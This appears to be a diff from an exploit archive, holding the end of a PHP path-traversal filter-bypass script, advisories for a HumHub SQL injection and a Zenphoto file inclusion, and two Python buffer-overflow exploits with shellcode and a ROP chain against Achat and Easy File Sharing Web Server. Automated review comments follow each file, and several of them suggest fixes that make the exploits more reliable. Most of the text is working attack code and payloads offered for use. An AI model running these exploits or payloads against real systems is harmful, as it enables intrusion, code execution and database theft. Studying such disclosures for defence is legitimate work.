    curl_setopt($ch,CURLOPT_HEADER,1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_TIMEOUT,50);
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
    return curl_exec($ch);
    curl_close($ch);
}

list($param,$file) = explode(':',$data);

$FilterBypassing = '....//';
for($i=0;$i<10;$i++)
{
    $DataToPost[$param] = $FilterBypassing.$file;
    $response = CurlPost($url,$DataToPost);
    if(strstr($response,$needle)!==FALSE)
    {
        echo $response;
        echo "\n\nExploited successfully!\n";
        echo 'Payload: ',$DataToPost[$param],"\n\n\n";
        die();
    }

    $FilterBypassing .= '....//';
}
?>
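Review bot: `curl_close($ch)` sits after `return curl_exec($ch)` and is unreachable, so the handle is never closed (style). The substantive point for the record is the `....//` prefix that the loop repeats: its name (`$FilterBypassing`) and shape indicate a sanitiser that removes `../` once and non-recursively, leaving `../` behind after the strip, which is the detail behind the advisory's "fails to sanitize user-supplied input". The fix for that class is to canonicalise the resolved path and check it against an allowed base directory instead of stripping sequences, and `....//` in a POST parameter is a precise string to alert on; affected per the file is Limonade 3.0, with no fixed version given.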
88
platforms/php/webapps/38831.txt
Executable file
@ -0,0 +1,88 @@
=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 ===

HumHub - SQL-Injection
------------------------------------------------------------------------

Tested Versions
===============
HumHub 0.11.2 and 0.20.0-beta.2

Issue Overview
==============
Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Technical Risk: high
Likelihood of Exploitation: high
Vendor: HumHub GmbH & Co. KG
Vendor URL: https://www.humhub.org
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt
Advisory Status: Public
CVE-Number: ----
CVE URL: ---


Impact
======
Enables to read and modify the HumHub Mysql Database.


Issue Description
=================
While conducting an internal software evaluation, LSE Leading
Security Experts GmbH discovered that the humhub social networking
software is subject to an sql-injection attack.


Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to block
access to the humhub software until the vendor
provides a patch.

Proof of Concept
================

Opening the following URL

http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&mode=normal

shows the SQL-error, which is easily exploitable using sqlmap.

./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&mode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2 -p from -a
|
||||
|
||||
...
|
||||
|
||||
---
|
||||
Parameter: from (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=-4670 OR 5804=5804#&mode=normal
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal
|
||||
|
||||
Type: stacked queries
|
||||
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
||||
Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal
|
||||
---
|
||||
|
||||
|
||||
|
||||
History
|
||||
=======
|
||||
2015-10-14 Issue discovered
|
||||
2015-10-15 Vendor contacted
|
||||
2015-10-15 Vendor response and hotfix
|
||||
2015-10-20 Vendor releases fixed versions
|
||||
2015-11-30 Advisory release
|
||||
|
||||
GPG Signature
|
||||
=============
|
||||
This advisory is signed with the GPG key of the
|
||||
LSE Leading Security Experts GmbH advisories team.
|
||||
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc
|
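Review bot: the "Temporary Workaround and Fix" section (block access until the vendor provides a patch) is stale given the History section, which records "2015-10-20 Vendor releases fixed versions"; the advisory should name the fixed HumHub versions and recommend upgrading, with the blocking advice kept only for installations that cannot update. The sqlmap command line in the Proof of Concept embeds what look like live session values (`sin=...` and `CSRF_TOKEN=...`); these should be replaced with placeholders before publication even if they came from a test instance. Minor: "Vulnerability Type: 89" should read "CWE-89", the "CVE-Number: ----" / "CVE URL: ---" fields should state explicitly that no CVE was assigned, and the "Likelihood of Exploitation: high" rating is consistent with the PoC showing an unauthenticated-looking GET parameter (`from`) reaching the query, which the Issue Description could say in one sentence.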
83
platforms/php/webapps/38841.txt
Executable file
|
@ -0,0 +1,83 @@
|
|||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
====================
|
||||
www.zenphoto.org
|
||||
|
||||
|
||||
Product:
|
||||
===================
|
||||
Zenphoto 1.4.10
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
========================
|
||||
Local File Inclusion
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
======================
|
||||
Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion
|
||||
that allows attackers
|
||||
to read arbitrary server files outside of the current web directory by
|
||||
injecting "../" directory traversal
|
||||
characters, which can lead to sensitive information disclosure, code
|
||||
execution or DOS on the victims web server.
|
||||
|
||||
|
||||
Local File Inclusion Codes:
|
||||
==========================
|
||||
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================
|
||||
Vendor Notification: November 10, 2015
|
||||
December 1, 2015 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
Description:
|
||||
=====================================================
|
||||
Request Method(s): [+] GET
|
||||
|
||||
|
||||
Vulnerable Product: [+] Zenphoto 1.4.10
|
||||
|
||||
|
||||
Vulnerable Parameter(s): [+] extension
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
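Review bot: "Exploitation Technique: Local" contradicts the rest of the advisory: the PoC is an HTTP GET (`Request Method(s): [+] GET`) to `zp-core/pluginDoc.php` with the `extension` parameter, i.e. remote exploitation; "Local" here appears to conflate "Local File Inclusion" with a local attack vector. The Disclosure Timeline records "Vendor Notification: November 10, 2015" but no vendor response or fixed version, so readers cannot tell whether 1.4.10 is the last affected release or whether any patch exists; state the fix status (or that none was received) so operators know whether to update or to restrict access to `pluginDoc.php` in the meantime. Minor wording in Vulnerability Details: "Zen Photos pluginDoc.php PHP file" should read "Zenphoto's pluginDoc.php file", and "DOS on the victims web server" should read "DoS on the victim's web server".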
78
platforms/windows/remote/36025.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
#!/usr/bin/python
|
||||
# Author KAhara MAnhara
|
||||
# Achat 0.150 beta7 - Buffer Overflow
|
||||
# Tested on Windows 7 32bit
|
||||
|
||||
import socket
|
||||
import sys, time
|
||||
|
||||
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
|
||||
#Payload size: 512 bytes
|
||||
|
||||
buf = ""
|
||||
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
|
||||
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
|
||||
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
|
||||
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
|
||||
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
|
||||
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
|
||||
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
|
||||
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
|
||||
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
|
||||
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
|
||||
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
|
||||
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
|
||||
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
|
||||
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
|
||||
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
|
||||
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
|
||||
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
|
||||
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
|
||||
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
|
||||
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
|
||||
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
|
||||
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
|
||||
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
|
||||
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
|
||||
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
|
||||
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
|
||||
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
|
||||
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
|
||||
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
|
||||
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
|
||||
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
|
||||
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
|
||||
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
|
||||
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
|
||||
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
|
||||
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
|
||||
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
|
||||
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
|
||||
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
|
||||
buf += "\x65\x6d\x30\x41\x41"
|
||||
|
||||
|
||||
# Create a UDP socket
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
server_address = ('192.168.91.130', 9256)
|
||||
|
||||
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
|
||||
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
|
||||
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
|
||||
p += "\x62" + "A"*45
|
||||
p += "\x61\x40"
|
||||
p += "\x2A\x46"
|
||||
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
|
||||
p += "\x61\x43" + "\x2A\x46"
|
||||
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
|
||||
p += buf + "A" * (1152 - len(buf))
|
||||
p += "\x00" + "A"*10 + "\x00"
|
||||
|
||||
print "---->{P00F}!"
|
||||
i=0
|
||||
while i<len(p):
|
||||
if i > 172000:
|
||||
time.sleep(1.0)
|
||||
sent = sock.sendto(p[i:(i+8192)], server_address)
|
||||
i += sent
|
||||
sock.close()
|
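Review bot: `import sys, time` imports `sys` but never uses it, while the target is hard-coded as `server_address = ('192.168.91.130', 9256)`; either read host and port from `sys.argv` with a usage message, or drop the import. The send loop (`sent = sock.sendto(p[i:(i+8192)], server_address)` / `i += sent`) assumes each datagram goes out in full; a short send would leave the tail of that chunk unsent and the loop would silently continue from the wrong offset, and a failing `sendto` raises an uncaught exception rather than reporting the error, so an explicit check that `sent == len(chunk)` is warranted. The length arithmetic in `"C" * (157-len(fs)- 31-3)` and `"A"*(3750-46)` is uncommented, so a reviewer cannot verify the layout from the file alone; the `#Payload size: 512 bytes` comment should likewise be checked against `len(buf)` rather than hard-coded. The file uses the Python 2 `print` statement under an unversioned `#!/usr/bin/python` shebang.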
199
platforms/windows/remote/38829.py
Executable file
|
@ -0,0 +1,199 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)
|
||||
# Date: 29/11/2015
|
||||
# Exploit Author: Knaps
|
||||
# Contact: @TheKnapsy
|
||||
# Website: http://blog.knapsy.com
|
||||
# Software Link: http://www.sharing-file.com/efssetup.exe
|
||||
# Version: Easy File Sharing Web Server v7.2
|
||||
# Tested on: Windows 7 x64, but should work on any other Windows platform
|
||||
#
|
||||
# Notes:
|
||||
# - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)
|
||||
# - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :)
|
||||
# - bad chars: '\x00' and '\x3b'
|
||||
# - max shellcode size allowed: 1260 bytes
|
||||
#
|
||||
|
||||
import sys, socket, struct
|
||||
|
||||
# ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)
|
||||
# Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.
|
||||
def create_rop_chain():
|
||||
|
||||
rop_gadgets = [
|
||||
# Generate value of 201 in EAX
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0xFFFFFDFF, # Value of '-201'
|
||||
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
|
||||
|
||||
# Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)
|
||||
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
|
||||
|
||||
# Carry on with the ROP as generated by mona.py
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
|
||||
|
||||
# Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location
|
||||
# used solely by the remaining part of the above gadget (it doesn't really do anything for us)
|
||||
0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll]
|
||||
0x61c73281, # &Writable location [sqlite3.dll]
|
||||
|
||||
# And carry on further as generated by mona.py
|
||||
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
|
||||
0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll]
|
||||
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
|
||||
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
|
||||
0x10013ad6, # POP EBP # RETN [ImageLoad.dll]
|
||||
0x61c227fa, # & push esp # ret [sqlite3.dll]
|
||||
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
|
||||
|
||||
# Now bunch of ugly increments... unfortunately couldn't find anything nicer :(
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
|
||||
0x1001b4f6, # POP ECX # RETN [ImageLoad.dll]
|
||||
0x61c73281, # &Writable location [sqlite3.dll]
|
||||
0x100194b3, # POP EDI # RETN [ImageLoad.dll]
|
||||
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0x90909090, # nop
|
||||
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||
|
||||
|
||||
# Check command line args
|
||||
if len(sys.argv) <= 1:
|
||||
print "Usage: python poc.py [host] [port]"
|
||||
exit()
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2])
|
||||
|
||||
|
||||
# Offsets
|
||||
rop_offset = 2455
|
||||
max_size = 5000
|
||||
seh_offset = 4059
|
||||
eax_offset = 4183
|
||||
|
||||
|
||||
# move ESP out of the way so the shellcode doesn't corrupt itself during execution
|
||||
# metasm > add esp,-1500
|
||||
shellcode = "\x81\xc4\x24\xfa\xff\xff"
|
||||
|
||||
# Just as a PoC, spawn calc.exe. Replace with any other shellcode you want
|
||||
# (maximum size of shellcode allowed: 1260 bytes)
|
||||
#
|
||||
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python
|
||||
# Payload size: 220 bytes
|
||||
shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31"
|
||||
shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5"
|
||||
shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96"
|
||||
shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1"
|
||||
shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde"
|
||||
shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68"
|
||||
shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5"
|
||||
shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f"
|
||||
shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9"
|
||||
shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96"
|
||||
shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28"
|
||||
shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40"
|
||||
shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a"
|
||||
shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed"
|
||||
shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce"
|
||||
shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3"
|
||||
shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85"
|
||||
|
||||
|
||||
buffer = "A" * rop_offset # padding
|
||||
buffer += create_rop_chain()
|
||||
buffer += shellcode
|
||||
buffer += "A" * (seh_offset - len(buffer)) # padding
|
||||
buffer += "BBBB" # overwrite nSEH pointer
|
||||
buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])
|
||||
buffer += "A" * (eax_offset - len(buffer)) # padding
|
||||
buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception
|
||||
buffer += "A" * (max_size - len(buffer)) # padding
|
||||
|
||||
|
||||
httpreq = (
|
||||
"GET /changeuser.ghp HTTP/1.1\r\n"
|
||||
"User-Agent: Mozilla/4.0\r\n"
|
||||
"Host:" + host + ":" + str(port) + "\r\n"
|
||||
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
"Accept-Language: en-us\r\n"
|
||||
"Accept-Encoding: gzip, deflate\r\n"
|
||||
"Referer: http://" + host + "/\r\n"
|
||||
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
|
||||
"Conection: Keep-Alive\r\n\r\n"
|
||||
)
|
||||
|
||||
# Send payload to the server
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.send(httpreq)
|
||||
s.close()
|
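Review bot: the argument check `if len(sys.argv) <= 1:` only guards the no-argument case, so running the script with a host and no port reaches `port = int(sys.argv[2])` and dies with an IndexError instead of the usage message; use `if len(sys.argv) < 3:` and `sys.exit(1)` in place of the bare `exit()`. In the request, `"Conection: Keep-Alive\r\n\r\n"` misspells `Connection` and `"Host:" + host` omits the space after the colon; both are tolerated by lenient servers but worth fixing. `s.send(httpreq)` can return after writing only part of the roughly 5 KB request (`max_size = 5000` plus headers); `s.sendall(httpreq)` is the correct call. The comment `# max shellcode size allowed: 1260 bytes` is never enforced, so an `assert len(shellcode) <= 1260` next to the `buffer += shellcode` line would catch a substituted payload that overruns `seh_offset`. The script uses the Python 2 `print` statement and `str` concatenation of binary data under `#!/usr/bin/env python`, which will fail on a Python 3 interpreter.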